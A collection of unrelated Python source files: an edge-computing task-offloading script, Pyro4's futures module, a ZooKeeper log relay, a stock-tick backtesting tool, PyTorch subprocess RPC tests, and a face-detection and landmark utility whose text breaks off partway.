threads_[-1].start()
input('start..')
print('========= Waiting for tasks ==========')
_time_ = dt.datetime.now()
while True:
try:
if len(received_task_queue) > 0:
info = received_task_queue.pop(0)
tasks, t_time = info
print('RMS List of Processes: ', tasks, '\n')
print('\n========= Running Deadlock Algorithm ===========')
lcm_result, task_load = load_tasks()
list_seq = get_exec_seq(scheduler(lcm_result, task_load))
if len(list_seq) > 0: # do only when there is a task in safe sequence
wait_list = calc_wait_time(list_seq)
print('\nWaiting Time List: ', wait_list)
compare_result = compare_local_mec(wait_list)
print('\nExecute Locally: ', compare_result[1])
_loc += len(compare_result[1]) # total number of tasks to be executed locally
print('\nExecute in MEC: ', compare_result[0])
if len(compare_result[0]) > 0:
print('\nSending to cooperative platform')
cooperative_mec(compare_result[0])
execute(compare_result[1])
generate_results()
_time_ = dt.datetime.now()
else:
send_message(str('wt {} 0.0'.format(ip_address())))
time.sleep(0.4)
now = dt.datetime.now()
delta = now - _time_
if delta > dt.timedelta(minutes=4):
print('terminating programme 3 mins elapsed')
stop = False
break
except KeyboardInterrupt:
print('\nProgramme Terminated')
stop = False
cmd = 'kill -9 {}'.format(os.getpid())
os.system(cmd)
break
print('algo stopped!')
class BrokerSend:
def __init__(self, user, pw, ip, sub_topic, data):
self.user = user
self.pw = pw
self.ip = ip
self.port = 1883
self.topic = sub_topic
self.response = None
self.client = mqtt.Client()
self.client.username_pw_set(self.user, self.pw)
self.client.connect(self.ip, self.port, 60)
self.data = data
def publish(self):
self.client.publish(self.topic, self.data)
def __del__(self):
print('BrokerSend Object Deleted!')
def run_me(mec_no_, send_path, broker_ip_): # call this from agent
global discovering
global mec_no
global host_ip
global my_algo
global broker_ip
print('mec ip: ', ip_address())
my_algo = psutil.Process()
discovering_group()
offloading_group()
host_ip_set()
mec_no = mec_no_
broker_ip = broker_ip_
host_ip = ip_address()
print('MEC Details: ', hosts)
discovering = 1
time.sleep(2)
for host in hosts:
if hosts[host] != host_ip:
mec_rtt[hosts[host]] = []
os.system(f'echo {mec_no}/{send_path} >> started.txt')
start_loop()
print('saving data')
save_and_send(send_path)
print('send alert to control')
time.sleep(r.uniform(1, 30))
data = pickle.dumps([get_hostname(), host_ip])
broker_dict = {'user': 'mec', 'pw': 'password', 'sub_topic': 'control', 'ip': '192.168.122.111', 'data': data}
BrokerSend(**broker_dict).publish()
print('Terminating process')
cmd = 'kill -9 {}'.format(os.getpid())
os.system(cmd)
def main():
global hosts
global cloud_ip
# (--n, --mec_no_, --cloud_ip, --s_path, --b_ip) send_path = f'/home/mec/result/{kind}/{count}'
mec_nodes = {'mec-9': '192.168.122.119', 'mec-8': '192.168.122.118', 'mec-7': '192.168.122.117',
'mec-6': '192.168.122.116', 'mec-5': '192.168.122.115', 'mec-4': '192.168.122.114',
'mec-3': '192.168.122.113', 'mec-2': '192.168.122.112', 'mec-1': '192.168.122.111',
}
gui = {'osboxes-0': '192.168.122.110'}
cloud_ips = ['192.168.200.11', '192.168.200.12']
b_ip = '192.168.122.111'
parser = argparse.ArgumentParser()
parser.add_argument('--n', type=int, default=1.0, help='Number of MEC nodes')
parser.add_argument('--p', type=str, default='/home/mec/result/python', help='Path to send result: homo_1')
args = parser.parse_args()
kind, count = args.p.split('_')
send_path = f'/home/mec/result/{kind}/{count}'
ho = sorted(list(mec_nodes))[:args.n - 1]
hosts = {**{host: mec_nodes[host] for host in ho if ho != get_hostname()}, **gui}
ho += ['osboxes-0']
cloud_ip = cloud_ips[ho.index(get_hostname()) % 2]
os.system('clear')
run_me(mec_no_=args.n, send_path=send_path, broker_ip_=b_ip)
if __name__ == '__main__':
main()
|
futures.py
|
"""
Support for Futures (asynchronously executed callables).
If you're using Python 3.2 or newer, also see
http://docs.python.org/3/library/concurrent.futures.html#future-objects
Pyro - Python Remote Objects. Copyright by Irmen de Jong (irmen@razorvine.net).
"""
from __future__ import with_statement
import sys
import functools
import logging
from Pyro4 import threadutil, util
__all__=["Future", "FutureResult", "_ExceptionWrapper"]
log=logging.getLogger("Pyro4.futures")
class Future(object):
"""
Holds a callable that will be executed asynchronously and provide its
result value some time in the future.
This is a more general implementation than the AsyncRemoteMethod, which
only works with Pyro proxies (and provides a bit different syntax).
"""
def __init__(self, callable):
self.callable = callable
self.chain = []
def __call__(self, *args, **kwargs):
"""
Start the future call with the provided arguments.
Control flow returns immediately, with a FutureResult object.
"""
chain = self.chain
del self.chain # make it impossible to add new calls to the chain once we started executing it
result=FutureResult() # notice that the call chain doesn't sit on the result object
thread=threadutil.Thread(target=self.__asynccall, args=(result, chain, args, kwargs))
thread.setDaemon(True)
thread.start()
return result
def __asynccall(self, asyncresult, chain, args, kwargs):
try:
value = self.callable(*args, **kwargs)
# now walk the callchain, passing on the previous value as first argument
for call, args, kwargs in chain:
call = functools.partial(call, value)
value = call(*args, **kwargs)
asyncresult.value = value
except Exception:
# ignore any exceptions here, return them as part of the async result instead
asyncresult.value=_ExceptionWrapper(sys.exc_info()[1])
def then(self, call, *args, **kwargs):
"""
Add a callable to the call chain, to be invoked when the results become available.
The result of the current call will be used as the first argument for the next call.
Optional extra arguments can be provided in args and kwargs.
"""
self.chain.append((call, args, kwargs))
class FutureResult(object):
"""
The result object for asynchronous calls.
"""
def __init__(self):
self.__ready=threadutil.Event()
self.callchain=[]
self.valueLock=threadutil.Lock()
def wait(self, timeout=None):
"""
Wait for the result to become available, with optional timeout (in seconds).
Returns True if the result is ready, or False if it still isn't ready.
"""
result=self.__ready.wait(timeout)
if result is None:
# older pythons return None from wait()
return self.__ready.isSet()
return result
@property
def ready(self):
"""Boolean that contains the readiness of the async result"""
return self.__ready.isSet()
def get_value(self):
self.__ready.wait()
if isinstance(self.__value, _ExceptionWrapper):
self.__value.raiseIt()
else:
return self.__value
def set_value(self, value):
with self.valueLock:
self.__value=value
# walk the call chain but only as long as the result is not an exception
if not isinstance(value, _ExceptionWrapper):
for call, args, kwargs in self.callchain:
call = functools.partial(call, self.__value)
self.__value = call(*args, **kwargs)
if isinstance(self.__value, _ExceptionWrapper):
break
self.callchain=[]
self.__ready.set()
value=property(get_value, set_value, None, "The result value of the call. Reading it will block if not available yet.")
def then(self, call, *args, **kwargs):
"""
Add a callable to the call chain, to be invoked when the results become available.
The result of the current call will be used as the first argument for the next call.
Optional extra arguments can be provided in args and kwargs.
"""
if self.__ready.isSet():
# value is already known, we need to process it immediately (can't use the callchain anymore)
call = functools.partial(call, self.__value)
self.__value = call(*args, **kwargs)
else:
# add the call to the callchain, it will be processed later when the result arrives
with self.valueLock:
self.callchain.append((call, args, kwargs))
return self
class _ExceptionWrapper(object):
"""Class that wraps a remote exception. If this is returned, Pyro will
re-throw the exception on the receiving side. Usually this is taken care of
by a special response message flag, but in the case of batched calls this
flag is useless and another mechanism was needed."""
def __init__(self, exception):
self.exception=exception
def raiseIt(self):
if sys.platform=="cli":
util.fixIronPythonExceptionForPickle(self.exception, False)
raise self.exception
|
log_stream.py
|
import logging
import os
import threading
import zookeeper
import sys
from twisted.internet import reactor
logger = logging.getLogger(__name__)
_installed = False
_relay_thread = None
_logging_pipe = None
def _relay_log():
global _installed, _logging_pipe
r, w = _logging_pipe
f = os.fdopen(r)
levels = dict(
ZOO_INFO = 'info',
ZOO_WARN = 'warn',
ZOO_ERROR = 'error',
ZOO_DEBUG = 'debug',
)
# this function is used as a small redirect in order to make sure that this module
# is considered the "calling module" by piped.log, and not twisted.internet.base, which
# is used if reactor.callFromThread is allowed to log directly.
def log_message(logger, message):
logger(message)
while _installed:
try:
line = f.readline().strip()
if '@' in line:
level, message = line.split('@', 1)
level = levels.get(level.split(':')[-1])
# this line is definitely misclassified in the C client....
if 'Exceeded deadline by' in line and level == 'warn':
level = 'debug'
# reclassify failed server connection attemps as INFO instead of ERROR:
if 'server refused to accept the client' in line and level == 'error':
level = 'info'
else:
level = None
message = line # TODO: can we genereate a better logging message?
if not message:
continue
if level is None:
reactor.callFromThread(log_message, logger.info, message)
else:
reactor.callFromThread(log_message, getattr(logger, level), message)
except Exception as v:
logger.error('Exception occurred while relaying zookeeper log.', exc_info=True)
def is_installed():
return _installed
def install():
global _installed, _relay_thread, _logging_pipe
if is_installed():
return
_logging_pipe = os.pipe()
zookeeper.set_log_stream(os.fdopen(_logging_pipe[1], 'w'))
_installed = True
_relay_thread = threading.Thread(target=_relay_log)
_relay_thread.setDaemon(True) # die along with the interpreter
_relay_thread.start()
def uninstall():
if not is_installed():
return
global _installed, _relay_thread
_installed = False
zookeeper.set_log_stream(sys.stderr)
# TODO: make sure the thread is actually stopped
_relay_thread.join()
|
backfinder_tick.py
|
import os
import sys
import sqlite3
import pandas as pd
from multiprocessing import Process, Queue
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from utility.setting import db_tick, db_backfind
from utility.static import now, strf_time
class BackFinderTick:
def __init__(self, q_, code_list_, df_mt_):
self.q = q_
self.code_list = code_list_
self.df_mt = df_mt_
self.Start()
def Start(self):
conn = sqlite3.connect(db_tick)
tcount = len(self.code_list)
for k, code in enumerate(self.code_list):
columns = ['등락율', '시가대비등락율', '고저평균대비등락율', '거래대금', '누적거래대금', '전일거래량대비',
'체결강도', '체결강도차이', '거래대금차이', '전일거래량대비차이']
df_bf = pd.DataFrame(columns=columns)
df = pd.read_sql(f"SELECT * FROM '{code}'", conn)
df = df.set_index('index')
avgtime = 300
for h, index in enumerate(df.index):
if df['현재가'][h:h + avgtime].max() > df['현재가'][index] * 1.05:
per = df['등락율'][index]
oper = round((df['현재가'][index] / df['시가'][index] - 1) * 100, 2)
hper = df['고저평균대비등락율'][index]
sm = int(df['거래대금'][index])
dm = int(df['누적거래대금'][index])
vp = df['전일거래량대비'][index]
ch = df['체결강도'][index]
gap_ch = round(df['체결강도'][index] - df['체결강도'][h - avgtime:h].mean(), 2)
gap_sm = round(df['거래대금'][index] - df['거래대금'][h - avgtime:h].mean(), 2)
gap_vp = round(df['전일거래량대비'][index] - df['전일거래량대비'][h - avgtime:h].mean(), 2)
df_bf.at[code + index] = per, oper, hper, sm, dm, vp, ch, gap_ch, gap_sm, gap_vp
print(f' 백파인더 검색 중 ... [{k + 1}/{tcount}]')
self.q.put(df_bf)
conn.close()
class Total:
def __init__(self, q_, last_):
super().__init__()
self.q = q_
self.last = last_
self.Start()
def Start(self):
df = []
k = 0
while True:
data = self.q.get()
df.append(data)
k += 1
if k == self.last:
break
if len(df) > 0:
df = pd.concat(df)
conn = sqlite3.connect(db_backfind)
df.to_sql(f"{strf_time('%Y%m%d')}_tick", conn, if_exists='replace', chunksize=1000)
conn.close()
if __name__ == "__main__":
start = now()
q = Queue()
con = sqlite3.connect(db_tick)
df_name = pd.read_sql("SELECT name FROM sqlite_master WHERE TYPE = 'table'", con)
df_mt = pd.read_sql('SELECT * FROM moneytop', con)
con.close()
df_mt = df_mt.set_index('index')
table_list = list(df_name['name'].values)
table_list.remove('moneytop')
last = len(table_list)
w = Process(target=Total, args=(q, last))
w.start()
procs = []
workcount = int(last / 6) + 1
for j in range(0, last, workcount):
code_list = table_list[j:j + workcount]
p = Process(target=BackFinderTick, args=(q, code_list, df_mt))
procs.append(p)
p.start()
for p in procs:
p.join()
w.join()
end = now()
print(f' 백파인더 소요시간 {end - start}')
|
test_subprocess.py
|
"""Unit tests specifically for the components of SubprocessWorker.
End-to-end tests (e.g. does SubprocessWorker properly implement the
WorkerBase API) still live in `test_worker`.
"""
import functools
import os
import sys
import textwrap
import threading
import typing
from torch.testing._internal.common_utils import TestCase, run_tests
try:
from components._impl.tasks import base as task_base
from components._impl.workers import subprocess_rpc
except (ImportError, ModuleNotFoundError):
print(f"""
This test must be run from the repo root directory as
`python -m components.test.{os.path.splitext(os.path.basename(__file__))[0]}`
""")
raise
class TestParseFunction(TestCase):
@staticmethod
def _indent(s: str) -> str:
return textwrap.indent(s, " " * 12)
def test_parse_trivial(self) -> None:
def f(x: int) -> None:
pass
_, body = task_base.parse_f(f)
self.assertExpectedInline(
self._indent(body), """\
pass""",
)
def test_parse_simple(self) -> None:
def f(
x: int,
) -> None:
for _ in range(10):
pass
_, body = task_base.parse_f(f)
self.assertExpectedInline(
self._indent(body), """\
for _ in range(10):
pass""",
)
def test_parse_inline(self) -> None:
def f(x: typing.Any, y: int = 1) -> None: print([x for _ in range(y)])
_, body = task_base.parse_f(f)
self.assertExpectedInline(
self._indent(body), """\
print([x for _ in range(y)])""",
)
def test_parse_with_comments(self) -> None:
def f(
x: int, # This is a comment
y: bool, # also a comment
# More comments.
) -> typing.Any: # Comment on return line.
"""Docstring
Note: This will be dropped in Python 3.7. See `parse_f` for details.
"""
x += 1
y = """
This is preserved.
"""
# Comment in src.
return y
_, body = task_base.parse_f(f)
# Python 3.7 removes docstring but 3.8+ doesn't. See `parse_f` for details.
docstring = """\
\"\"\"Docstring
Note: This will be dropped in Python 3.7. See `parse_f` for details.
\"\"\"\n\n""" if sys.version_info[:2] > (3,7) else ""
self.assertExpectedInline(
self._indent(body), f"""{docstring}\
x += 1
y = \"\"\"
This is preserved.
\"\"\"
# Comment in src.
return y""",
)
def test_parse_method(self) -> None:
class MyClass:
@staticmethod
def f(x: int) -> int:
"""Identity, but with more steps"""
return x
@staticmethod
def g(x: int) -> int:
"""Identity, but with more steps
Culled, as this is a multi-line docstring
"""
return x
_, body = task_base.parse_f(MyClass.f)
self.assertExpectedInline(
self._indent(body), """\
\"\"\"Identity, but with more steps\"\"\"
return x""",
)
_, body = task_base.parse_f(MyClass.g)
# Python 3.7 removes docstring but 3.8+ doesn't. See `parse_f` for details.
docstring = """\
\"\"\"Identity, but with more steps
Culled, as this is a multi-line docstring
\"\"\"\n""" if sys.version_info[:2] > (3,7) else ""
self.assertExpectedInline(
self._indent(body), f"""{docstring}\
return x""",
)
def test_parse_pathological(self) -> None:
def f(
x: \
int,
y: typing.Dict[str, int],
*,
z: str,
# Isn't that a charming (but legal) indentation?
) \
-> typing.Optional[typing.Union[
float, int]
]: # Just for good measure.
"""Begin the actual body.
(For better or worse...)
"""
del x
q = y.get(
z,
None,
)
# Intermediate comment
if False:
return 1
elif q:
raise ValueError
q = 1
_, body = task_base.parse_f(f)
# Python 3.7 removes docstring but 3.8+ doesn't. See `parse_f` for details.
docstring = """\
\"\"\"Begin the actual body.
(For better or worse...)
\"\"\"\n""" if sys.version_info[:2] > (3,7) else ""
self.assertExpectedInline(
self._indent(body), f"""{docstring}\
del x
q = y.get(
z,
None,
)
# Intermediate comment
if False:
return 1
elif q:
raise ValueError
q = 1""",
)
def test_fully_typed(self) -> None:
def f(x):
pass
with self.assertRaisesRegex(
TypeError,
"Missing type annotation for parameter `x`"
):
task_base.parse_f(f)
def g(x: int):
pass
with self.assertRaisesRegex(
TypeError,
"Missing return annotation."
):
task_base.parse_f(g)
def test_no_functor(self) -> None:
class F:
def __call__(self) -> None:
pass
with self.assertRaisesRegex(TypeError, "Expected function, got"):
task_base.parse_f(F())
def test_no_variadic(self) -> None:
def f(*args) -> None:
pass
with self.assertRaisesRegex(
TypeError,
r"Variadic positional argument `\*args` not permitted for `run_in_worker` function."
):
task_base.parse_f(f)
def g(**kwargs) -> None:
pass
with self.assertRaisesRegex(
TypeError,
r"Variadic keywork argument `\*\*kwargs` not permitted for `run_in_worker` function."
):
task_base.parse_f(g)
def test_no_decorator(self) -> None:
def my_decorator(f: typing.Callable) -> typing.Callable:
@functools.wraps(f)
def g(*args, **kwargs) -> typing.Any:
return f(*args, **kwargs)
return g
@my_decorator
def f() -> None:
pass
with self.assertRaisesRegex(
TypeError,
"`f` cannot be decorated below `@run_in_worker`"
):
task_base.parse_f(f)
class TestSubprocessRPC(TestCase):
def test_pipe_basic_read_write(self) -> None:
pipe = subprocess_rpc.Pipe()
# Test small read.
msg = b"abc"
pipe.write(msg)
self.assertEqual(msg, pipe.read())
# Test large read.
msg = b"asdjkf" * 1024
pipe.write(msg)
self.assertEqual(msg, pipe.read())
def test_pipe_stacked_read_write(self) -> None:
pipe = subprocess_rpc.Pipe()
pipe.write(b"abc")
pipe.write(b"def")
pipe.write(b"ghi")
self.assertEqual(b"abc", pipe.read())
self.assertEqual(b"def", pipe.read())
self.assertEqual(b"ghi", pipe.read())
def test_pipe_clone(self) -> None:
msg = b"msg"
pipe = subprocess_rpc.Pipe()
alt_pipe_0 = subprocess_rpc.Pipe(write_handle=pipe.write_handle)
alt_pipe_0.write(msg)
self.assertEqual(msg, pipe.read())
with self.assertRaises(IOError):
alt_pipe_0.read()
alt_pipe_1 = subprocess_rpc.Pipe(read_handle=pipe.read_handle)
pipe.write(msg)
self.assertEqual(msg, alt_pipe_1.read())
with self.assertRaises(IOError):
alt_pipe_1.write(msg)
def test_pipe_timeout(self) -> None:
result = {}
def callback():
result["callback_run"] = True
# We have to run this in a thread, because if the timeout mechanism
# fails we don't want the entire unit test suite to hang.
pipe = subprocess_rpc.Pipe(writer_pid=os.getpid(), timeout=0.5, timeout_callback=callback)
def target():
try:
pipe.read()
except Exception as e:
result["e"] = e
thread = threading.Thread(target=target)
thread.daemon = True
thread.start()
thread.join(timeout=10)
e: typing.Optional[Exception] = result.get("e", None)
self.assertIsNotNone(e)
with self.assertRaisesRegex(OSError, "Exceeded timeout: 0.5"):
raise e
self.assertTrue(result.get("callback_run", None), True)
def test_pipe_concurrent_timeout(self) -> None:
result = {"callback_count": 0, "exceptions": []}
def callback():
result["callback_count"] += 1
timeouts = [0.5, 1.0, 1.5]
pipes = [
subprocess_rpc.Pipe(writer_pid=os.getpid(), timeout=timeout, timeout_callback=callback)
for timeout in timeouts
]
def target(pipe):
try:
pipe.read()
except Exception as e:
result["exceptions"].append(e)
threads = [threading.Thread(target=target, args=(pipe,)) for pipe in pipes]
[t.start() for t in threads]
[t.join(timeout=5) for t in threads]
self.assertEqual(result["callback_count"], 3)
self.assertEqual(len(result["exceptions"]), 3)
for e in result["exceptions"]:
with self.assertRaisesRegex(OSError, "Exceeded timeout:"):
raise e
def test_pipe_cleanup(self) -> None:
assertTrue = self.assertTrue
assertFalse = self.assertFalse
del_audit = {"count": 0}
class OwnCheckingPipe(subprocess_rpc.Pipe):
def __init__(self):
super().__init__()
self._cleanup_was_run = False
assertTrue(self._owns_pipe)
def _close_fds(self) -> None:
super()._close_fds()
self._cleanup_was_run = True
def __del__(self) -> None:
super().__del__()
assert self._cleanup_was_run
del_audit["count"] += 1
class NonOwnCheckingPipe(subprocess_rpc.Pipe):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
assertFalse(self._owns_pipe)
def _close_fds(self) -> None:
raise IOError("This would damage the owning pipe")
def __del__(self) -> None:
super().__del__()
del_audit["count"] += 1
pipe = OwnCheckingPipe()
alt_pipe_0 = NonOwnCheckingPipe(read_handle=pipe.read_handle)
alt_pipe_1 = NonOwnCheckingPipe(write_handle=pipe.write_handle)
alt_pipe_2 = NonOwnCheckingPipe(
read_handle=pipe.read_handle,
write_handle=pipe.write_handle,
)
del pipe
del alt_pipe_0
del alt_pipe_1
del alt_pipe_2
# Make sure the tests we expect in __del__ actually ran.
self.assertEqual(del_audit["count"], 4)
class TestSubprocessExceptions(TestCase):
def _test_raise(
self,
raise_type: typing.Type[Exception],
reraise_type: typing.Type[Exception],
) -> None:
try:
raise raise_type("Fail")
except Exception as e:
e_raised = e # `e` is scoped to the `except` block
tb = sys.exc_info()[2]
serialized_e = subprocess_rpc.SerializedException.from_exception(e=e, tb=tb)
with self.assertRaises(reraise_type):
subprocess_rpc.SerializedException.raise_from(serialized_e)
if raise_type is reraise_type:
try:
subprocess_rpc.SerializedException.raise_from(serialized_e)
self.fail("`raise_from` failed to raise.")
except Exception as e:
self.assertEqual(e_raised.args, e.args)
def _test_raise_builtin(self, raise_type: typing.Type[Exception]) -> None:
self._test_raise(raise_type=raise_type, reraise_type=raise_type)
def test_unserializable(self) -> None:
# Make sure we can always get an exception out, even if we can't
# extract any debug info.
serialized_e = subprocess_rpc.SerializedException.from_exception(e=None, tb=None)
with self.assertRaises(subprocess_rpc.UnserializableException):
subprocess_rpc.SerializedException.raise_from(serialized_e)
class MyException(Exception):
pass
class MyIOError(IOError):
pass
self._test_raise(MyException, subprocess_rpc.UnserializableException)
self._test_raise(MyIOError, subprocess_rpc.UnserializableException)
def test_serializable(self) -> None:
self._test_raise_builtin(Exception)
self._test_raise_builtin(AssertionError)
self._test_raise_builtin(IOError)
self._test_raise_builtin(NameError)
self._test_raise_builtin(ValueError)
if __name__ == '__main__':
run_tests()
|
find_face.py
|
#coding:utf-8
import datetime
from itertools import count
import os
import re
import shutil
import time
import face_recognition
import cv2
import matplotlib.pyplot as plt
import sys
from PIL import Image, ImageDraw
from pathlib import Path
import random
import dlib
from concurrent.futures import ThreadPoolExecutor
from multiprocessing import Process
from threading import Thread
from PyQt5.QtWidgets import QApplication, QWidget, QMessageBox
import qdarkstyle
import numpy as np
class readfile():
def __init__(self) -> None:
self.files = []
def allfile(self, path) -> None:
if os.path.isdir(path):
files = os.listdir(path)
for file in files:
new_file = path+'/'+file
if os.path.isdir(new_file):
self.allfile(new_file)
else:
self.files.append(new_file)
else:
self.files.append(path)
def listfiles(self, path) -> list:
path = self.format_path(path)
self.allfile(path)
return self.files
def format_path(self, path) -> str:
path = os.path.abspath(path)
path = path.replace('\\', '/')
path = path.replace('//', '/')
path = path[:-1] if path[-1] == '/' else path
return path
def last_path(self, path) -> str:
path = path[path.rfind('/')+1:]
return path
def sub_path(self, path, rootpath) -> str:
path = path[path.find(rootpath)+len(rootpath):]
path = path[1:] if path[0] == '/' else path
return path
# face_recognition 文档:https://github.com/ageitgey/face_recognition/blob/master/README_Simplified_Chinese.md
class Findface():
def find_face_cv2(self, img_path, pass_dir, fail_dir):
# 读取原始图像
img = cv2.imread(img_path)
# 调用熟悉的人脸分类器 检测特征类型
# 人脸 - haarcascade_frontalface_default.xml
# 人眼 - haarcascade_eye.xm
# 微笑 - haarcascade_smile.xml
face_detect = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
# 检查人脸 按照1.1倍放到 周围最小像素为5
face_zone = face_detect.detectMultiScale(img, scaleFactor=1.1, minNeighbors=5)
# print ('识别人脸的信息:',face_zone)
if type(face_zone) != tuple:
print(f"{img_path} {'='*10} pass")
return True
if not os.path.exists(pass_dir): os.makedirs(pass_dir)
Image.open(img_path).convert('RGB').save(f"{pass_dir}{random.randint(1, 10000000000)}.jpg")
# # 绘制矩形和圆形检测人脸
# for x, y, w, h in face_zone:
# # 绘制矩形人脸区域 thickness表示线的粗细
# cv2.rectangle(img, pt1=(x, y), pt2=(x+w, y+h),color=[0,0,255], thickness=2)
# # 绘制圆形人脸区域 radius表示半径
# cv2.circle(img, center=(x+w//2, y+h//2), radius=w//2, color=[0,255,0], thickness=2)
# # 设置图片可以手动调节大小
# cv2.namedWindow("Easmount-CSDN", 0)
# # 显示图片
# cv2.imshow("Easmount-CSDN", img)
# # 等待显示 设置任意键退出程序
# cv2.waitKey(0)
# cv2.destroyAllWindows()
else:
print(f"{img_path} {'='*10} fail")
return False
if not os.path.exists(fail_dir): os.makedirs(fail_dir)
Image.open(img_path).convert('RGB').save(f"{fail_dir}{random.randint(1, 10000000000)}.jpg")
def find_face_fr(self, img_path, pass_dir, fail_dir):
image=face_recognition.load_image_file(img_path)
face_locations=face_recognition.face_locations(image)
face_num2=len(face_locations)
# print(face_num2)
if face_num2:
print(f"{img_path} {'='*10} pass")
return True
if not os.path.exists(pass_dir): os.makedirs(pass_dir)
Image.open(img_path).convert('RGB').save(f"{pass_dir}{random.randint(1, 10000000000)}.jpg")
# org=cv2.imread(img_path)
# for i in range(0,face_num2):
# top=face_locations[i][0]
# right=face_locations[i][1]
# bottom=face_locations[i][2]
# left=face_locations[i][3]
# start=(left,top)
# end=(right,bottom)
# color=(0,255,0)
# thickness=5
# img=cv2.rectangle(org,start,end,color,thickness)
# plt.imshow(img)
# plt.axis("off")
# plt.show()
if face_num2 == 0:
print(f"{img_path} {'='*10} fail")
return False
if not os.path.exists(fail_dir): os.makedirs(fail_dir)
Image.open(img_path).convert('RGB').save(f"{fail_dir}{random.randint(1, 10000000000)}.jpg")
# cv2.imshow("Easmount-CSDN", image)
# cv2.waitKey(0)
# cv2.destroyAllWindows()
def mkdir(self, path):
path = re.findall("(.*/)", path)[0]
print("当前路径:", path)
folder = os.path.exists(path)
if not folder:
os.makedirs(path)
print("#"*50)
print("建立新的文件路径于: {}".format(path))
print("#"*50)
def writeFile(self, path, file):
self.mkdir(path)
with open(path, 'w', encoding='UTF-8') as f:
f.write(file)
f.close
print("成功写入文件至: {}".format(path))
return path
def mark_face_detail(self, path):
try:
image = face_recognition.load_image_file(path)
#查找图像中所有面部的所有面部特征
face_landmarks_list = face_recognition.face_landmarks(image)
face_landmarks = face_landmarks_list[0]
except Exception as error:
print("无法识别到人脸!!!!")
return False
allx = 0
ally = 0
for i in face_landmarks['right_eye']:
allx += i[0]
ally += i[1]
lex = round(allx/len(face_landmarks['right_eye']))
ley = round(ally/len(face_landmarks['right_eye']))
# print("left eye:", lex, ley, '\n', "**"*40)
allx = 0
ally = 0
for i in face_landmarks['left_eye']:
allx += i[0]
ally += i[1]
rex = round(allx/len(face_landmarks['right_eye']))
rey = round(ally/len(face_landmarks['right_eye']))
# print("right eye:", rex, rey, '\n', "**"*40)
nsx = face_landmarks['nose_bridge'][-1][0]
nsy = face_landmarks['nose_bridge'][-1][1]
# print("nose:", nsx, nsy, '\n', "**"*40)
maxt = max(face_landmarks['top_lip'])
maxb = max(face_landmarks['bottom_lip'])
lm = maxt if maxt == maxb else max([maxt, maxb])
lmx = lm[0]
lmy = lm[1]
# print("left lip:", lmx, lmy, '\n', "**"*40)
mint = min(face_landmarks['top_lip'])
minb = min(face_landmarks['bottom_lip'])
rm = mint if mint == minb else min([mint, minb])
rmx = rm[0]
rmy = rm[1]
# print("right lip:", rmx, rmy, '\n', "**"*40)
ffpfile = f"LEX {lex}\nLEY {ley}\nREX {rex}\nREY {rey}\nNSX {nsx}\nNSY {nsy}\nLMX {lmx}\nLMY {lmy}\nRMX {rmx}\nRMY {rmy}"
# print(ffpfile)
filename = readfile().last_path(path)
filename = filename.replace('jpg', 'ffp')
dir = '{}/Downloads/FFP/{}'.format(str(Path.home()), filename)
self.writeFile(dir, ffpfile)
def show_face_mark(self, path):
path = readfile().format_path(path)
image = face_recognition.load_image_file(path)
#查找图像中所有面部的所有面部特征
face_landmarks_list = face_recognition.face_landmarks(image)
# print("I found {} face(s) in this photograph.".format(len(face_landmarks_list)))
if not face_landmarks_list:
print("无法识别到人脸!!!!")
return False
face_landmarks = face_landmarks_list[0]
#打印此图像中每个面部特征的位置
facial_features = [
'chin',
'nose_bridge',
'left_eye',
'right_eye',
'top_lip',
'bottom_lip'
]
for facial_feature in facial_features:
print("The {} in this face has the following points: {}".format(facial_feature, face_landmarks[facial_feature]))
# 获取面部标记点
print("**"*40)
# 在图像中描绘出每个人脸特征!
pil_image = Image.fromarray(image)
d = ImageDraw.Draw(pil_image)
for facial_feature in facial_features:
d.line(face_landmarks[facial_feature], width=1)
pil_image.show()
def unit_mark_face_detail(self, paths):
for path in paths:
self.mark_face_detail(path)
def multprocess(self, path):
path = readfile().format_path(path)
paths = readfile().listfiles(path)
start = datetime.datetime.now()
length = len(paths)
p1 = []
p2 = []
p3 = []
p4 = []
p5 = []
for i in range(length):
if i < round(length/5):
p1.append(paths[i])
elif i >= round(length/5) and i <(2*round(length/5)):
p2.append(paths[i])
elif i >= (2*round(length/5)) and i < (3*round(length/5)):
p3.append(paths[i])
elif i >= (3*round(length/5)) and i < (4*round(length/5)):
p4.append(paths[i])
else:
p5.append(paths[i])
multp = [p1,p2,p3,p4,p5]
# q = Queue()
process_list = []
for i in multp:
print("开始运行")
p = Process(target=self.unit_mark_face_detail,args=(i,))
p.start()
process_list.append(p)
for p in process_list:
p.join()
end = datetime.datetime.now()
print(f"总图片:{length} 张 {'*'*10} 用时:{(end - start).seconds} 秒 {'*'*10} 每秒:{round(length/int((end - start).seconds))} 张")
app = QApplication([])
self.Tips("人脸图片标注已结束\n文件保存在下载文件夹中")
def unit_find_face(self, pathlist, pass_dir, fail_dir, mode):
ps = []
fl = []
coun = 1
if mode == 'fr':
for path in pathlist:
if self.find_face_fr(path, pass_dir, fail_dir):
ps.append(path)
else:
fl.append(path)
print(f"识别进度:{coun} / {len(pathlist)}")
coun += 1
if mode == 'cv2':
for path in pathlist:
if self.find_face_cv2(path, pass_dir, fail_dir):
ps.append(path)
else:
fl.append(path)
print(f"识别进度:{coun} / {len(pathlist)}")
coun += 1
for i in ps:
if not os.path.exists(pass_dir): os.makedirs(pass_dir)
Image.open(i).convert('RGB').save(f"{pass_dir}{random.randint(1, 10000000000)}.jpg")
for i in fl:
if not os.path.exists(fail_dir): os.makedirs(fail_dir)
Image.open(i).convert('RGB').save(f"{fail_dir}{random.randint(1, 10000000000)}.jpg")
def multp_find_face(self, path, tmpfile):
start = datetime.datetime.now()
# use fr to check the face
path = readfile().format_path(path)
paths = readfile().listfiles(path)
fail_dir = '{}/Downloads/finish_fail/'.format(str(Path.home()))
# pass_dir_fr = 'fr_pass/'
pass_dir_fr = tmpfile
length = len(paths)
p1 = []
p2 = []
p3 = []
p4 = []
p5 = []
p6 = []
for i in range(length):
if i < round(length/6):
p1.append(paths[i])
elif i >= round(length/6) and i <(2*round(length/6)):
p2.append(paths[i])
elif i >= (2*round(length/6)) and i < (3*round(length/6)):
p3.append(paths[i])
elif i >= (3*round(length/6)) and i < (4*round(length/6)):
p4.append(paths[i])
elif i >= (4*round(length/6)) and i < (5*round(length/6)):
p5.append(paths[i])
else:
p6.append(paths[i])
multp = [p1,p2,p3,p4,p5,p6]
process_list = []
for i in multp:
print("开始运行")
